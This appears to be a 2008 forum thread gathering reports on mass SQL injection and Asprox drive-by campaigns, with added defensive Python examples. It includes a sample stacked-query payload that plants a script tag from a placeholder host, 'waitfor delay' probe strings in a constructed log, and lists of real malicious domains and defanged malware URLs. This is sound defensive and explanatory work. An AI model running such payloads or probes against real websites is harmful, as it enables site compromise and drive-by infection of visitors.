* http://preview.tinyurl.com/6f2uro
Apr 07, 2008 - "phpBB 3.0.1 released... critical bugs fixed..."


2008-05-14, 12:23
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

SQL Injection Attacks Becoming More Intense
- http://www.f-secure.com/weblog/archives/00001435.html
May 13, 2008 - "The mass SQL injection attacks... are increasing in number and we're seeing more domains being injected and used to host the attack files. We believe that there is now more than one group using a set of different automated tools to inject the code. Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:
www .wowgm1 .cn
www .killwow1 .cn
www .wowyeye .cn
vb008 .cn
9i5t .cn
computershello .cn
We've now seen other domains being used as well such as direct84 .com which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available*. The direct84 .com domain fast-fluxes to several different IPs in Europe, Israel and North America. The injected link eventually leads to a backdoor detected as Backdoor:W32/Agent.DAS. This is a good time to again mention that it's not a vulnerability in Microsoft IIS or Microsoft SQL that is used to make this happen. If you are an administrator of a website that is using ASP/ASP.NET, you should make sure that you sanitize all inputs before you allow them to access the database. There are many articles on how to do this such as this one**. You could also have a look at URLScan*** which provides an easy way to filter this particular attack based on the length of the QueryString."

* http://www.secureworks.com/research/threats/danmecasprox/
May 13, 2008 - "...the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts..."

** http://msdn.microsoft.com/en-us/library/ms998271.aspx

*** http://www.microsoft.com/technet/security/tools/urlscan.mspx

Also see: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513
May 13, 2008
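The F-Secure advice quoted above (sanitize inputs before they reach the database; the flaw is in the web application, not in IIS or SQL Server) is easiest to see with the weak pattern and the fixed pattern side by side. The following is an added example, not code from F-Secure, ISC or any site mentioned in this thread. It uses Python's sqlite3 with a constructed two-row "pages" table; the injected tag points at a placeholder host (malware-host.invalid), and executescript stands in for the stacked-statement execution that SQL Server gave the real attackers. The parameterized and validated lookups are the forms a defender should be writing.

```python
import sqlite3

# Constructed rows standing in for a CMS "pages" table behind an ASP site.
SEED_ROWS = [
    (1, "Home", "<p>Welcome</p>"),
    (2, "Contact", "<p>Mail us</p>"),
]

# Placeholder host; stands in for the script hosts named in the thread.
INJECTED_TAG = '<script src="http://malware-host.invalid/1.js"></script>'

# Constructed attacker input for the page-id parameter: a second statement
# stacked after the expected numeric id (SQLite spells string
# concatenation ||, SQL Server uses +).
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, page_id):
    """The weak pattern: untrusted text pasted straight into the SQL string.

    executescript mimics the batch execution of stacked statements that
    made the ASP/SQL Server injections in this thread possible; a plain
    execute() in sqlite3 would refuse the second statement outright."""
    conn.executescript("SELECT title, body FROM pages WHERE id = " + page_id + ";")


def lookup_parameterized(conn, page_id):
    """Hardened form 1: bind the value; the driver never parses it as SQL."""
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (page_id,)
    ).fetchone()


def lookup_validated(conn, page_id):
    """Hardened form 2: allow-list the shape of the input as well as binding it."""
    if not page_id.isdigit():
        raise ValueError("page id must be a decimal integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchone()


def injected_pages(conn):
    """Number of rows that now carry the injected script tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM pages WHERE body LIKE ?", ("%" + INJECTED_TAG + "%",)
    ).fetchone()[0]


def run_comparison():
    vuln = make_db()
    lookup_vulnerable(vuln, PAYLOAD)          # the stacked UPDATE runs

    safe = make_db()
    bound = lookup_parameterized(safe, PAYLOAD)  # bound text matches no id
    try:
        lookup_validated(safe, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True

    return {
        "vulnerable_rows_injected": injected_pages(vuln),      # 2
        "parameterized_rows_injected": injected_pages(safe),   # 0
        "parameterized_result": bound,                         # None
        "validated_rejected": rejected,                        # True
        "validated_home": lookup_validated(safe, "1"),         # ("Home", "<p>Welcome</p>")
    }


if __name__ == "__main__":
    for key, value in run_comparison().items():
        print(key, value)
```

Binding alone already stops the injection because the bound value is compared as data and never re-parsed; the validation step on top of it turns the same input into a logged error instead of a silent empty result, which is what a site operator reading access logs would want to see.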


2008-05-14, 20:57
(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Posted May 14, 2008, at 07:42 AM - "Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google). Note that these numbers decay with time. Some of these domains were injected long ago and have been cleaned. At their height, their numbers may have been larger.

www .nihaorr1 .com -468,000
free .hostpinoy .info -444,000
xprmn4u .info -369,000
www .nmidahena .com -140,000
winzipices .cn -75,000

www .aspder .com -62,000
www .11910 .net -47,000
bbs .jueduizuan .com -44,000
www .bluell .cn -44,000
www .2117966 .net -39,000

xvgaoke .cn -33,000
www .414151 .com -17,000
yl18 .net -15,000
www .kisswow .com .cn -13,000
c .uc8010 .com -9500

www .ririwow .cn -6000
www .killwow1 .cn -4000
www .wowgm1 .cn -3500
www .wowyeye .cn -2800
9i5t .cn -2500

computershello .cn -2300
b15 .3322 .org -1200
www .direct84 .com -1100
smeisp .cn -85
free .edivid .info -40
h28 .8800 .org -34

ucmal .com -30
usuc .us -13
www .wowgm2 .cn -8
www .adword72 .com -2

=> Posted May 14, 2008, at 07:42 AM.

2008-05-19, 13:40

Mass SQL Injection Attack Targets Chinese Web Sites
- http://preview.tinyurl.com/5tmj3q
May 19, 2008 3:00 AM PDT (PC World) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan. First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP (Internet Protocol) addresses, said Wayne Huang, chief executive officer of Armorize Technologies, in Taipei. "The attack is ongoing,... even if they can't successfully insert malware, they're killing lots of Web sites right now, because they're just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim websites," Huang said... Technical details of the malware, including the specific browser vulnerabilities exploited, were not immediately available..."


2008-05-19, 19:37
More on the China/Taiwan SQL attacks...

- http://preview.tinyurl.com/56u2m7
May 19, 2008 (Computerworld) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites... The attackers in the more recent outbreak aren't targeting a specific vulnerability. Instead, they are using an automated SQL injection attack engine that is tailored to attack Web sites using SQL Server, Huang said. The attack uses SQL injection to infect targeted Web sites with malware, which in turn exploits vulnerabilities in the browsers of those who visit the Web sites, he said, calling the attack "very well designed." The malware injected by the attack comes from 1,000 different servers and targets 10 vulnerabilities in Internet Explorer and related plug-ins that are popular in Asia, Huang said.

The vulnerabilities are MS06-014 (CVE-2006-0003), MS07-017 (CVE-2007-1765), RealPlayer IERPCtl.IERPCtl.1 (CVE-2007-5601), GLCHAT.GLChatCtrl.1 (CVE-2007-5722), MPS.StormPlayer.1 (CVE-2007-4816), QvodInsert.QvodCtrl.1, DPClient.Vod (CVE-2007-6144), BaiduBar.Tool.1 (CVE-2007-4105), VML Exploit (CVE-2006-4868) and PPStream (CVE-2007-4748)."
- http://nvd.nist.gov/nvd.cfm

- http://blog.trendmicro.com/chinese-weekend-compromise/
May 19, 2008


2008-05-19, 23:28

- http://www.computerworld.com/comments/node/9086658#comment-92914
[China and Taiwan - SQL injection attacks]
Submitted by Anonymous tech on May 19, 2008 - 16:11.
" 'Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites...'

That appears to be incorrect - the SQL injection plants a java-scripted IFRAME which re-directs the victim's browser to an attacker's site that performs the exploits. Please check the facts. More than one source would confirm it.

Every other SQL injection attack to date has done that, using an Mpack-like exploit tool at the attackers' site - NOT the site that was the victim of the SQL injection."


2008-05-20, 11:09
FYI... (apologies for the long post - needed for detail):

- http://blog.trendmicro.com/yet-more-weekend-compromises-reach-other-shores/
May 19, 2008 - "...This discovery comes on the tail of the mass compromise* of APAC sites (China, Taiwan, Hong Kong, and Singapore). Curious is how some of the malicious URLs in this new set of compromises are the same as in the first mass compromise. The four sites — humanitarian, government, and news — were injected with the malicious JavaScript..."

Chinese Weekend Compromise
* http://blog.trendmicro.com/chinese-weekend-compromise/
May 19, 2008 - "Just a week after half a million Web sites were compromised, here comes another mass Web threat... This time, Senior Threat Analyst Aries Hsieh, together with our research team in Taiwan, picked up on another script injection attack aimed at Web sites in the Chinese language... A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site hxxp ://{BLOCKED} .us /s.js

JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:
1. Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
2. Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
3. Checks for GLAVATAR.GLAvatarCtrl.1
4. Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
5. Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong. These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:
* hxxp ://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
* hxxp ://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
* hxxp ://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
* hxxp ://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
* hxxp ://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
These four malware, in turn, download and execute
hxxp ://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag..."

(Screenshots available at both TrendMicro URLs above.)


2008-05-21, 04:07
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/diary.html?storyid=4439
Last Updated: 2008-05-20 16:55:25 UTC ...(Version: 3) - "...Shadowserver has published a list of domains used in past -and- recent massive SQL injections* that insert malicious javascript into websites. The list is just focused on mass SQL injection attacks... plans to maintain this list as we come across new domains over time. The list also contains an estimate of the current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource..."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Full list of Injected Sites ...last modified date/time at bottom of page


2008-06-02, 13:27

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Page last modified on June 01, 2008, at 09:04 PM
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google)...
Some of these have been re-injected by URL encoding the script names. So if a host/domain shows up in parentheses and also in the list unencoded, these were two separate injection runs..."

("Full list..." at the URL above.)
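The Shadowserver note above about re-injection with URL-encoded script names, together with the example tag quoted in the 2008-05-07 post (a bare, unquoted src pointing at winzipices.cn), suggests what a site owner's own check of saved page source should do: pull every script src, percent-decode it before looking at it, and compare the host (and its parent domains) against the published list. The following is an added example, not code from Shadowserver or ISC; the blocklist is a hand-copied subset of the hosts named in this thread, and the sample HTML is constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Hosts taken from the Shadowserver list quoted above; a real deployment
# would load the maintained list instead of hard-coding a subset.
BLOCKLIST = {
    "winzipices.cn", "nihaorr1.com", "nmidahena.com", "aspder.com",
    "free.hostpinoy.info", "xprmn4u.info", "bluell.cn", "kisswow.com.cn",
    "ririwow.cn", "direct84.com", "en-us18.com",
}

# Matches <script ... src=VALUE ...>; VALUE may be double-quoted,
# single-quoted or bare, as in the injected tag quoted in the thread.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE | re.DOTALL,
)

# Constructed page source: one local script, two injected remote scripts
# (the second with a percent-encoded file name), one legitimate CDN script.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src=http://winzipices.cn/5.js></script>
</head><body><p>Welcome</p>
<script src="http://www.nihaorr1.com/%31.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</body></html>"""


def host_is_listed(host, blocklist):
    """True if the host itself or any parent domain is on the list."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def find_injected_scripts(html, blocklist=BLOCKLIST):
    """Return one record per remote script whose host is on the blocklist."""
    hits = []
    for match in SCRIPT_SRC.finditer(html):
        raw = next(g for g in match.groups() if g is not None).strip()
        # Percent-decode before parsing: the re-injected variants hide the
        # script name, and can hide the host, behind URL encoding.
        src = unquote(raw)
        if src.startswith("//"):
            src = "http:" + src
        if "://" not in src:
            continue  # relative path: served from this site, not a remote host
        parts = urlsplit(src)
        host = parts.hostname or ""
        if host_is_listed(host, blocklist):
            hits.append({"raw": raw, "host": host, "path": parts.path})
    return hits


if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_HTML):
        print(hit["host"], hit["path"], "<-", hit["raw"])
```

Run it over pages fetched from your own server (or over a database dump of the text columns the injection rewrote) rather than over live third-party sites; the list is a decaying snapshot, so an empty result means only that none of the listed hosts is referenced, not that the page is clean.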


2008-06-03, 04:27

New sql injection site with fastflux hosting
- http://isc.sans.org/diary.html?storyid=4519
Last Updated: 2008-06-02 22:13:22 UTC - "One of our frequent contributors notified us of a new sql injection site.
hxxp ://en-us18 .com /b.js is being injected via sql into websites.
When I googled for it I saw 560 injected webpages. b.js injects an iFrame which points to
hxxp ://en-us18 .com/cgi-bin/index.cgi?ad which in turn embeds two Flash files:

advert.swf: http://www.virustotal.com/analisis/d6ffe290e9938d3e646f82c536abd0c7
banner.swf: http://www.virustotal.com/analisis/83be3d4d30eb60d92272625634a3babc

This appears to be fast fluxed or at least setup to change rapidly based on this dig output... A second dig a few minutes later produced similar but slightly different results. So this domain is changing. I guess they got tired of people blackholing their ip address. So in that case I would recommend you dns blackhole that domain."


2008-06-06, 13:51
And the list just keeps on growing...

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Page last modified on June 05, 2008, at 07:10 AM
Page last modified on June 06, 2008, at 06:22 AM


2008-06-18, 13:38

- http://preview.tinyurl.com/64qke6
June 17, 2008 (trustedsource.org/blog) - "MTV France has become another victim of the “Latest Wave of SQL Injection Attacks“. The web site and the RSS feed are heavily infected with several malicious scripts as seen in the screenshot... Each of the malicious domains are serving a script called ‘b.js’ which is related to the “Danmec” malware family (a.k.a. “Asprox”). These domains are hosted on a “fast-flux” network of compromised computers which could also relay spam messages... The biggest concern with the infected RSS feed is that every RSS reader or web site, including the content from MTV France, will host the malicious scripts on their web sites. In a quick test with a WordPress 2.1.3 installation, the full content (including the script) was included in the blog and not filtered out. This is one example of the threat posed by Web 2.0 content mash-ups, where someone is including generated content via feeds into his web site and thereby just spreading the malicious code further."

(Screenshots available at the URL above.)
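The MTV France item above makes a point that is easy to miss: a site that republishes a feed inherits whatever script tags the feed carries, and the quoted WordPress test passed them through unfiltered. The defensive control is to treat feed HTML as untrusted and run it through an allow-list sanitizer before storing or rendering it. The following is an added example, not code from the trustedsource.org post or from WordPress; it uses only Python's html.parser, and the sample feed item (with a placeholder host, fastflux-host.invalid) is constructed.

```python
from html import escape
from html.parser import HTMLParser

# Elements whose entire content is removed, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
# The only tags and attributes a feed item is allowed to keep.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")

# Constructed feed item: a benign paragraph, an injected script tag, a
# javascript: link, a legitimate link and an injected iframe.
SAMPLE_ITEM = (
    "<p>New clip online</p>"
    '<script src="http://fastflux-host.invalid/b.js"></script>'
    '<a href="javascript:alert(1)">watch</a> '
    '<a href="http://example.com/clip">watch</a>'
    '<iframe src="http://fastflux-host.invalid/cgi-bin/index.cgi?ad"></iframe>'
)


def safe_url(value):
    v = (value or "").strip().lower()
    if v.startswith("//"):
        return False  # protocol-relative: resolves to an arbitrary host
    return v.startswith(SAFE_URL_PREFIXES)


class FeedSanitizer(HTMLParser):
    """Allow-list sanitizer: keeps a few formatting tags and attributes,
    escapes all text, and drops active content together with its body."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.skip_depth = 0   # > 0 while inside a DROP_WITH_CONTENT element
        self.dropped = []     # tag names removed, for logging

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers, style, class: all gone
            if name in ("href", "src") and not safe_url(value):
                continue  # javascript:, data: and protocol-relative URLs go
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/>, <img/>: no closing tag emitted

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize_feed_html(fragment):
    """Return (clean_html, dropped_tag_names) for one feed item body."""
    parser = FeedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    clean, dropped = sanitize_feed_html(SAMPLE_ITEM)
    print(clean)
    print("dropped:", dropped)
```

The dropped-tag list is worth logging: a feed that suddenly starts yielding script or iframe removals is the earliest signal that the upstream site was injected, well before any visitor reports a problem.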


2008-06-25, 14:02

Microsoft SQL Injection Prevention Strategy
- http://forums.spybot.info/showpost.php?p=205963&postcount=94

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
...last modified on June 25, 2008, at 05:17 AM


2008-06-27, 01:52

- http://www.theregister.co.uk/2008/06/26/microsoft_hp_sql_injection_tools/
26 June 2008 - "...ScanSafe, a company that monitors websites for malicious behavior, reports* a new wave of SQL-injection attacks that harnesses infected PCs to search out and attack vulnerable websites. Sites that are compromised, in turn, install backdoors on visitors' machines, creating a worm-like characteristic. The so-called Asprox attacks are distinct from a recent swarm of SQL attacks that over the past few months... The entry of Asprox suggests other malware gangs may be adopting the technique after seeing the success of their competitors..."
* http://preview.tinyurl.com/5cyo99
June 26, 2008 (ScanSafe STAT blog) - "The Asprox botnet began pumping out a fresh round of SQL injection attacks yesterday... The Asprox botnet causes infected computers (bots) to become the attack mechanism. Some of the bots are instructed to upload the SQL injection attack tool, which then queries search engines to find susceptible sites and attempts to exploit any found. Successful exploit results in compromised websites that silently attempt to infect visitors' computers. Other bots are used as hosts for the malware; these hosts appear to be using the Neosploit framework. Asprox uses fast flux, thus a single malware domain called by the compromised site may resolve to one of a number of IP addresses (i.e. one domain name may resolve to any one of a number of attacker-controlled victim computers commandeered to act as malware hosts)... a large number of the trafficked compromised sites appear to be from the manufacturing sector, particularly among companies involved in the manufacture or distribution of heating and cooling systems... the malware dropped in the June SQL injection attacks has shifted to backdoors and proxy Trojans - infections which add to the overall size of the Asprox botnet. The June attacks also appear to have some roots in the Ukraine and Malaysia, rather than China..."


2008-07-01, 12:53

More SQL Injection with Fast Flux hosting
- http://isc.sans.org/diary.html?storyid=4645
Last Updated: 2008-07-01 04:46:52 UTC ...(Version: 5) - "...More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:
hxxp :// updatead .com
hxxp :// upgradead .com
hxxp :// clsiduser.com
hxxp :// dbdomaine.com
b.js then redirects to several domains which host a cgi script
hxxp :// kadport .com /cgi-bin/indes.cgi?ad
hxxp :// hdadwcd .com /cgi-bin/index.cgi?ad
Which then redirects to ad.js which redirects the user to
hxxp :// spyware-quick-scan .com?wmid=1041&I=14&it=1&s=4t
This site attempts to trick the user into installing installer.exe
AV coverage is decent:
...This post has a nice running list of domains: http://infosec20.blogspot.com/2008/06/asprox-sql-injection-botnet-and-iframe.html
The cause seems to be the ASPROX bot kit, which got some SQL injection capabilities in mid-May, see http://www.heise-online.co.uk/security/Asprox-botnet-now-equipped-with-SQL-injection-tool--/news/110742.
Dr. Ulrich's post http://isc.sans.org/diary.html?storyid=4565 lays out very nicely how it all happens... The folks at ShadowServer are keeping a comprehensive and updated list at:
Page last modified on July 01, 2008, at 10:16 AM ..."


2008-07-03, 18:18

Sony PlayStation website hacked
- http://www.theregister.co.uk/2008/07/03/playstation_hack/
3 July 2008 - "Gamers visiting the US Sony PlayStation website risk malware infection after the site was hit by hackers. SQL injection vulnerabilities on the site were used by miscreants to load malicious code on pages showcasing the PlayStation games SingStar Pop and God of War, net security firm Sophos reports*. The code promotes scareware to visitors, which falsely claims that their computers are infected with computer viruses to frighten them into purchasing software of little or no security utility... Sophos informed Sony of the website vulnerabilities, which were purged by Thursday morning. The attack is the latest in a wave of SQL injection attacks that have turned the websites of legitimate organisations into conduits for drive-by download assaults. Recent victims have included the website of tennis regulators ITF and ATP, the professional players tour and Wal-Mart. Large-scale SQL Injection attacks starting around October 2007 have hit a large number of small sites as well as high-profile targets..."
* http://www.sophos.com/security/blog/2008/07/1540.html


2008-07-04, 14:56
Update... 7.4.2008

- http://atlas.arbor.net/summary/fastflux
"...Currently monitoring -6508- fastflux domains..."


2008-07-07, 14:02

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080705
5 July 2008 - "...People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...
Understanding the Danmec/Asprox Attacks...
Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in databases in ways it was never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.
The initial code has been an HTML "script" command, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download.
Innocent user wasn't targeted directly by the attacker's SQL injection. Instead, innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com. Evilsite.net then looks at the information presented by innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect command telling innocent user's browser to contact evilsite2.net (all without any interaction from innocent user). Finally, evilsite2.net provides a working exploit which compromises innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nastiness an attacker can drum up. Since this exploit is reliant on innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.
So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks."

(Graphic available at the Shadowserver URL above.)


2008-07-17, 12:00

Governmental, Healthcare, and Top Business Websites have fallen victims to the new round of Asprox mass attack
- http://www.finjan.com/MCRCblog.aspx?EntryId=2002
Jul 16, 2008 - "... The attack toolkit is designed to first search Google for webpages with the file extension [.asp] and then launch SQL injection attacks to append a reference to the malware file using the SCRIPT tag. During the first two weeks of July 2008, Finjan... detected over 1,000 unique Website domains that were compromised by this attack. Each of the compromised domains included a reference to a malware that was served by over 160 different domains across the Internet. Since the list of these malware serving domains increases every day, we believe this is just the tip of the iceberg for the scope and impact of this attack. Among the compromised websites we found were those of respectable organizations, governmental institutes, healthcare organizations as well as high-ranked websites... Each of the 160 different domains hosting [b.js] and [ngg.js] [fgg.js] points to the location of the malicious file which was unique to each and every one of them.
The pointed iframe loads an obfuscated JavaScript code which then downloads and executes the malware on the victim machine automatically. The exploit provided by writers of the new version of NeoSploit toolkit, which uses a refreshing code for the obfuscation (using the location of the page as part of the obfuscation function)... The malicious code of the above script exploits several vulnerabilities on the victim’s machine in order to heighten the chances for successful exploitation:
* MDAC Vulnerability
* QuickTime rtsp Vulnerability
* AOL SuperBuddy ActiveX Control Code Execution Vulnerability
Upon successful exploitation, a Trojan is downloaded and executed on the victim’s machine..."

(Screenshots available at the URL above.)

Also see:
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080705


2008-07-21, 18:08

SQL Injection List - Format Update
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 can be fetched in text form at http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."


2008-07-24, 13:07

- http://isc.sans.org/diary.html?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in a couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."
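The ISC diary above ends on the one thing the site owner can do: check the logs. The timing probe it describes leaves two traces in a web server log, the delay keyword in the query string and, if the injected statement actually ran, a response time of roughly the requested delay. That second trace is the valuable one, because it tells you the endpoint is injectable rather than merely being scanned. The following is an added example, not code from ISC; it reads constructed W3C-format (IIS-style) log lines with a time-taken column in milliseconds and reports each probe with a verdict. The 15-second threshold is an assumption chosen to sit below the 20-second delay the diary mentions.

```python
import re
from urllib.parse import unquote_plus

# Constructed W3C-format log lines, not from any real server.
# time-taken is in milliseconds, as IIS writes it.
SAMPLE_LOG = """#Software: constructed sample
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status time-taken
2008-07-24 07:40:01 192.0.2.10 GET /products.asp id=17 200 31
2008-07-24 07:40:09 192.0.2.10 GET /products.asp id=17;waitfor+delay+'0:0:20'-- 200 20047
2008-07-24 07:40:30 192.0.2.10 GET /news.cfm id=3%3Bwaitfor%20delay%20%270%3A0%3A20%27-- 200 62
2008-07-24 07:41:00 192.0.2.11 GET /report.asp year=2008 200 19800
"""

# Delay primitives used by timing probes against common database engines.
DELAY_PROBE = re.compile(
    r"waitfor\s+delay|sleep\s*\(|benchmark\s*\(|pg_sleep", re.IGNORECASE
)

# Assumed threshold: a probe whose response really took this long means the
# injected statement executed, so the endpoint is injectable, not just scanned.
EXECUTED_THRESHOLD_MS = 15000


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def classify(entry):
    """Return a finding for an entry carrying a delay probe, else None."""
    # IIS stores the query string URL-encoded with spaces as '+'.
    query = unquote_plus(entry.get("cs-uri-query", ""))
    if not DELAY_PROBE.search(query):
        return None
    try:
        taken_ms = int(entry.get("time-taken", "0"))
    except ValueError:
        taken_ms = 0
    executed = taken_ms >= EXECUTED_THRESHOLD_MS
    return {
        "client": entry.get("c-ip"),
        "stem": entry.get("cs-uri-stem"),
        "time_taken_ms": taken_ms,
        "delay_executed": executed,
        "verdict": "injectable: delay ran" if executed else "probed: delay did not run",
    }


def find_timing_probes(log_text):
    """All entries that carry a timing probe, with an executed/not-executed verdict."""
    return [f for f in (classify(e) for e in parse_w3c(log_text)) if f]


if __name__ == "__main__":
    for finding in find_timing_probes(SAMPLE_LOG):
        print(finding["client"], finding["stem"], finding["time_taken_ms"], finding["verdict"])
```

A slow request without the keyword (the last sample line) is deliberately not reported: response time on its own is not evidence of anything, and matching on the decoded query string keeps the percent-encoded Cold Fusion probe from slipping past the check. An "injectable" verdict is the signal to pull that endpoint's code, not just to block the client address.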


2008-08-08, 15:40

